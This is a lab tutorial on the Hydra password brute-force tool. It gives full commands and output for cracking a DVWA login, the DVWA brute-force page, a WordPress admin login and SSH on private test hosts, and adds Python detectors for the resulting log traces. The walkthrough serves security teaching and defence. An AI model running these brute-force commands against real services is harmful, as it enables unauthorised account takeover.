Tool overview:

Hydra is a password brute-force tool. It supports a large number of services: asterisk cisco cisco-enable cvs firebird ftp ftps http[s]-{head|get} http[s]-{get|post}-form http-proxy http-proxy-urlenum icq imap[s] irc ldap2[s] ldap3[-{cram|digest}md5][s] mssql mysql nntp oracle-listener oracle-sid pcanywhere pcnfs pop3[s] postgres rdp rexec rlogin rsh sip smb smtp[s] smtp-enum snmp socks5 ssh sshkey svn teamspeak telnet[s] vmauthd vnc xmpp

Prerequisites:

A machine with Hydra (the attacker) and a server running DVWA (the target). In this demo the target is a web server running DVWA (Damn Vulnerable Web App), a deliberately bug-ridden application, set to security level low. Instead of doing a full installation, we will use the Web Security Dojo 2 distribution.

Test architecture:

[Figure: Archi_Hydra]

Command syntax:

# hydra  -h
Hydra v7.5 (c)2013 by van Hauser/THC & David Maciejak - for legal purposes only

Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-SuvV46] [service://server[:PORT][/OPT]]

Options:
  -R        restore a previous aborted/crashed session
  -S        perform an SSL connect
  -s PORT   if the service is on a different default port, define it here
  -l LOGIN or -L FILE  login with LOGIN name, or load several logins from FILE
  -p PASS  or -P FILE  try password PASS, or load several passwords from FILE
  -x MIN:MAX:CHARSET  password bruteforce generation, type "-x -h" to get help
  -e nsr    try "n" null password, "s" login as pass and/or "r" reversed login
  -u        loop around users, not passwords (effective! implied with -x)
  -C FILE   colon separated "login:pass" format, instead of -L/-P options
  -M FILE   list of servers to be attacked in parallel, one entry per line
  -o FILE   write found login/password pairs to FILE instead of stdout
  -f / -F   exit when a login/pass pair is found (-M: -f per host, -F global)
  -t TASKS  run TASKS number of connects in parallel (per host, default: 16)
  -w / -W TIME  waittime for responses (32s) / between connects per thread
  -4 / -6   prefer IPv4 (default) or IPv6 addresses
  -v / -V / -d  verbose mode / show login+pass for each attempt / debug mode
  -U        service module usage details
  server    the target server (use either this OR the -M option)
  service   the service to crack (see below for supported protocols)
  OPT       some service modules support additional input (-U for module help)

Supported services: asterisk cisco cisco-enable cvs firebird ftp ftps http[s]-{head|get} http[s]-{get|post}-form http-proxy http-proxy-urlenum icq imap[s] irc ldap2[s] ldap3[-{cram|digest}md5][s] mssql mysql nntp oracle-listener oracle-sid pcanywhere pcnfs pop3[s] postgres rdp rexec rlogin rsh sip smb smtp[s] smtp-enum snmp socks5 ssh sshkey svn teamspeak telnet[s] vmauthd vnc xmpp

Hydra is a tool to guess/crack valid login/password pairs - usage only allowed
for legal purposes. This tool is licensed under AGPL v3.0.
The newest version is always available at http://www.thc.org/thc-hydra
These services were not compiled in: sapr3 afp ncp oracle.

Use HYDRA_PROXY_HTTP/HYDRA_PROXY and HYDRA_PROXY_AUTH environment for a proxy.
E.g.:  % export HTTP_PROXY=socks5://127.0.0.1:9150 (or socks4:// or connect://)
       % export HTTP_PROXY_HTTP=http://proxy:8080
       % export HTTP_PROXY_AUTH=user:pass

Examples:
  hydra -l user -P passlist.txt ftp://192.168.0.1
  hydra -L userlist.txt -p defaultpw imap://192.168.0.1/PLAIN
  hydra -C defaults.txt -6 pop3s://[fe80::2c:31ff:fe12:ac11]:143/TLS:DIGEST-MD5

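In this example we will use one of the following syntaxes:

hydra -l COMPTE_UTILISATEUR -P FICHIER_DICO -v -V ADDR_IP METHODE_FORM "URL:VARIABLES:CONDITION_ECHEC"

or

hydra -l COMPTE_UTILISATEUR -P FICHIER_DICO -v -V ADDR_IP METHODE_FORM "URL:VARIABLES:S=CONDITION_SUCCES"

Here COMPTE_UTILISATEUR is the user account, FICHIER_DICO the dictionary file, ADDR_IP the target's IP address, METHODE_FORM the form module (http-post-form or http-get-form), CONDITION_ECHEC a string found in the response to a failed login, and CONDITION_SUCCES a string found in the response to a successful one.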

Testing the DVWA login page:

We are going to brute force the application's login page, on the assumption that an admin account exists. We need to know the variables passed as arguments, and there are two ways to find them: read the page's source code and/or make a login attempt with arbitrary credentials and inspect it with Live Header or FireBug. From the source code:

<form action="login.php" method="post">
   <fieldset>
      <label for="user">Username</label> <input type="text" class="loginInput" size="20" name="username"><br />
      <label for="pass">Password</label> <input type="password" class="loginInput" AUTOCOMPLETE="off" size="20" name="password"><br />
      <p class="submit"><input type="submit" value="Login" name="Login"></p>
   </fieldset>
</form>

We can see that the form action is login.php, the method is POST, the arguments are username and password, and the button is Login.

We make a login attempt to learn the failure string: Login failed. The login/password (admin/password) is already known, but the goal here is to demonstrate how Hydra is used. We create a file dico.txt containing a list of passwords, including the correct one. With the command seen earlier, we get the following (from the attacking machine):

# hydra  -l admin -P dico.txt -v -V 192.168.5.40 http-post-form "/dvwa/login.php:username=^USER^&password=^PASS^&Login=Login:Login failed"
Hydra v7.5 (c)2013 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2014-05-15 22:46:27
[DATA] 5 tasks, 1 server, 5 login tries (l:1/p:5), ~1 try per task
[DATA] attacking service http-post-form on port 80
[VERBOSE] Resolving addresses ... done
[ATTEMPT] target 192.168.5.40 - login "admin" - pass "toto" - 1 of 5 [child 0]
[ATTEMPT] target 192.168.5.40 - login "admin" - pass "titi" - 2 of 5 [child 1]
[ATTEMPT] target 192.168.5.40 - login "admin" - pass "tata" - 3 of 5 [child 2]
[ATTEMPT] target 192.168.5.40 - login "admin" - pass "1234" - 4 of 5 [child 3]
[ATTEMPT] target 192.168.5.40 - login "admin" - pass "password" - 5 of 5 [child 4]
[VERBOSE] Page redirected to http://192.168.5.40/dvwa/login.php
[VERBOSE] Page redirected to http://192.168.5.40/dvwa/login.php
[VERBOSE] Page redirected to http://192.168.5.40/dvwa/index.php
[STATUS] attack finished for 192.168.5.40 (waiting for children to complete tests)
[VERBOSE] Page redirected to http://192.168.5.40/dvwa/login.php
[VERBOSE] Page redirected to http://192.168.5.40/dvwa/login.php
[80][www-form] host: 192.168.5.40   login: admin   password: password  <==== the correct login/password
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2014-05-15 22:46:28

Now let's move on to the application's "Brute Force" page:

Still with the same setup, we will test the Brute Force section of the site, URL = http://192.168.5.40/dvwa/vulnerabilities/brute/. We need to make a test attempt to get the failure string and start Firebug to see which headers may be needed, here the Cookie header.

<form action="#" method="GET">
    Username:<br><input type="text" name="username"><br>
    Password:<br><input type="password" AUTOCOMPLETE="off" name="password"><br>
    <input type="submit" value="Login" name="Login">
</form>

The form uses the GET method.

# hydra -l admin -P dico.txt -v -V 192.168.5.40 http-get-form "/dvwa/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login#:Username and/or password incorrect.:H=Cookie: security=low; PHPSESSID=s1cpqi893871j08mbaiv4lu5s0"

Hydra v7.5 (c)2013 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2014-05-15 22:57:50
[DATA] 5 tasks, 1 server, 5 login tries (l:1/p:5), ~1 try per task
[DATA] attacking service http-get-form on port 80
[VERBOSE] Resolving addresses ... done
[ATTEMPT] target 192.168.5.40 - login "admin" - pass "toto" - 1 of 5 [child 0]
[ATTEMPT] target 192.168.5.40 - login "admin" - pass "titi" - 2 of 5 [child 1]
[ATTEMPT] target 192.168.5.40 - login "admin" - pass "tata" - 3 of 5 [child 2]
[ATTEMPT] target 192.168.5.40 - login "admin" - pass "1234" - 4 of 5 [child 3]
[ATTEMPT] target 192.168.5.40 - login "admin" - pass "password" - 5 of 5 [child 4]
[80][www-form] host: 192.168.5.40 login: admin password: password <==== BINGO !!!
[STATUS] attack finished for 192.168.5.40 (waiting for children to complete tests)
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2014-05-15 22:57:50

Brute forcing the WordPress administration page:

We assume a test WordPress install is already set up and working; the architecture is unchanged from the previous tests. The login/password for the admin interface is alasta/monpasse.

The source code gives us this:

<form name="loginform" id="loginform" action="http://192.168.5.40/wp/wordpress/wp-login.php" method="post">
    <p>
        <label for="user_login">Identifiant<br />
	<input type="text" name="log" id="user_login" class="input" value="" size="20" /></label>
    </p>
    <p>
	<label for="user_pass">Mot de passe<br />
	<input type="password" name="pwd" id="user_pass" class="input" value="" size="20" /></label>
    </p>
    <p class="forgetmenot"><label for="rememberme"><input name="rememberme" type="checkbox" id="rememberme" value="forever"  /> Se souvenir de moi</label></p>
    <p class="submit">
	<input type="submit" name="wp-submit" id="wp-submit" class="button button-primary button-large" value="Connexion" />
	<input type="hidden" name="redirect_to" value="http://192.168.5.40/wp/wordpress/wp-admin/" />
	<input type="hidden" name="testcookie" value="1" />
    </p>
</form>

The only fields that really matter are log (the user account) and pwd (the password).
Here is the command to use (dictionary file modified):

# hydra  -l alasta -P dico.txt -v -V 192.168.5.40 http-post-form "/wp/wordpress/wp-login.php:log=^USER^&pwd=^PASS^:ERREUR"
Hydra v7.1 (c)2011 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2014-05-17 15:34:48
[VERBOSE] More tasks defined than login/pass pairs exist. Tasks reduced to 7.
[DATA] 7 tasks, 1 server, 7 login tries (l:1/p:7), ~1 try per task
[DATA] attacking service http-post-form on port 80
[VERBOSE] Resolving addresses ... done
[ATTEMPT] target 192.168.5.40 - login "alasta" - pass "test" - 1 of 7 [child 0]
[ATTEMPT] target 192.168.5.40 - login "alasta" - pass "toto" - 2 of 7 [child 1]
[ATTEMPT] target 192.168.5.40 - login "alasta" - pass "1234567890" - 3 of 7 [child 2]
[ATTEMPT] target 192.168.5.40 - login "alasta" - pass "titi" - 4 of 7 [child 3]
[ATTEMPT] target 192.168.5.40 - login "alasta" - pass "iloveyou" - 5 of 7 [child 4]
[ATTEMPT] target 192.168.5.40 - login "alasta" - pass "monpasse" - 6 of 7 [child 5]
[ATTEMPT] target 192.168.5.40 - login "alasta" - pass "password" - 7 of 7 [child 6]
[80][www-form] host: 192.168.5.40   login: alasta   password: monpasse     <====== the correct account/password
[STATUS] attack finished for 192.168.5.40 (waiting for children to finish)
1 of 1 target successfuly completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2014-05-17 15:34:50
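
Seen from the server side, the three web tests above leave the same trace: one client sending a burst of requests to a login URL within a second or two. The Python sketch below is an added example, not part of the original article; it flags such bursts in an Apache common/combined-format access log. The client addresses, log lines, threshold and window are constructed for illustration.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Login URLs taken from the tests above.
LOGIN_PATHS = ("/dvwa/login.php", "/dvwa/vulnerabilities/brute/",
               "/wp/wordpress/wp-login.php")
# Apache common/combined log prefix: client, timestamp, request line.
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(GET|POST) (\S+) [^"]*"')

def login_bursts(lines, threshold=5, window=timedelta(seconds=10)):
    """Return {(client, path): peak attempts inside one sliding window}
    for each client reaching `threshold` requests to a login URL."""
    recent = defaultdict(deque)  # (client, path) -> timestamps in window
    flagged = {}
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        client, stamp, method, url = m.groups()
        path = url.split("?", 1)[0]
        if path not in LOGIN_PATHS:
            continue
        # Count only real attempts: POSTs, or GETs carrying a password field.
        if method == "GET" and "password=" not in url:
            continue
        when = datetime.strptime(stamp, "%d/%b/%Y:%H:%M:%S %z")
        key, q = (client, path), recent[(client, path)]
        q.append(when)
        while when - q[0] > window:
            q.popleft()
        if len(q) >= threshold:
            flagged[key] = max(flagged.get(key, 0), len(q))
    return flagged

# Constructed sample: 7 POSTs in 2 s from one client, then a normal login.
SAMPLE = [
    f'192.168.5.20 - - [17/May/2014:15:34:{48 + i // 3:02d} +0200] '
    '"POST /wp/wordpress/wp-login.php HTTP/1.0" 200 3012'
    for i in range(7)
] + [
    '192.168.5.33 - - [17/May/2014:15:35:10 +0200] '
    '"POST /wp/wordpress/wp-login.php HTTP/1.1" 302 -',
]

if __name__ == "__main__":
    for (client, path), n in login_bursts(SAMPLE).items():
        print(f"{client} sent {n} login attempts to {path} within 10 s")
```

Because the DVWA brute-force form uses GET, each guessed password also ends up in the access log's request line, which is why the GET branch can key on the password parameter.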

Brute forcing an SSH login:

We will test an SSH brute force against a server using a list of accounts and a list of passwords; this is easier than a web form:

# hydra -L listuser.txt -P dico.txt  192.168.5.10 ssh
Hydra v7.1 (c)2011 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2014-05-17 16:20:23
[DATA] 16 tasks, 1 server, 21 login tries (l:3/p:7), ~1 try per task
[DATA] attacking service ssh on port 22
[22][ssh] host: 192.168.5.10   login: alasta   password: monpasse      <==== the correct login/password
[STATUS] attack finished for 192.168.5.10 (waiting for children to finish)
1 of 1 target successfuly completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2014-05-17 16:20:28
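
On the SSH server, the run above shows up as a series of "Failed password" messages from one address, ending in an "Accepted password" for the guessed account. The Python sketch below is an added example, not part of the original article; it reports password logins accepted from an address that had just failed repeatedly. The source addresses, host name, PID, the user names other than alasta and the threshold are constructed.

```python
import re
from collections import defaultdict

# OpenSSH password-auth messages as logged through syslog.
FAILED = re.compile(
    r"sshd\[\d+\]: Failed password for (?:invalid user )?(\S+) from (\S+) port")
ACCEPTED = re.compile(r"sshd\[\d+\]: Accepted password for (\S+) from (\S+) port")

def guessed_logins(lines, min_failures=5):
    """Return [(source, user, failures_before, users_tried)] for each
    password login accepted from an address that had already failed
    at least `min_failures` times."""
    failures = defaultdict(int)   # source address -> failed attempts so far
    users = defaultdict(set)      # source address -> account names tried
    hits = []
    for line in lines:
        m = FAILED.search(line)
        if m:
            user, src = m.groups()
            failures[src] += 1
            users[src].add(user)
            continue
        m = ACCEPTED.search(line)
        if m and failures[m.group(2)] >= min_failures:
            user, src = m.groups()
            hits.append((src, user, failures[src], len(users[src])))
    return hits

def sample_line(sec, msg, src="192.168.5.20"):
    """Build one constructed syslog line (host name and PID are made up)."""
    return f"May 17 16:20:{sec:02d} srv sshd[4242]: {msg} from {src} port 40000 ssh2"

# Constructed sample: 19 failures over 3 accounts, then a hit on alasta,
# followed by an unrelated clean login from another address.
SAMPLE = (
    [sample_line(24, f"Failed password for invalid user {u}")
     for u in ("test", "admin") for _ in range(7)]
    + [sample_line(26, "Failed password for alasta")] * 5
    + [sample_line(27, "Accepted password for alasta")]
    + [sample_line(59, "Accepted password for alasta", src="192.168.5.7")]
)

if __name__ == "__main__":
    for src, user, n, tried in guessed_logins(SAMPLE):
        print(f"{src}: login as {user} accepted after {n} failures "
              f"across {tried} accounts")
```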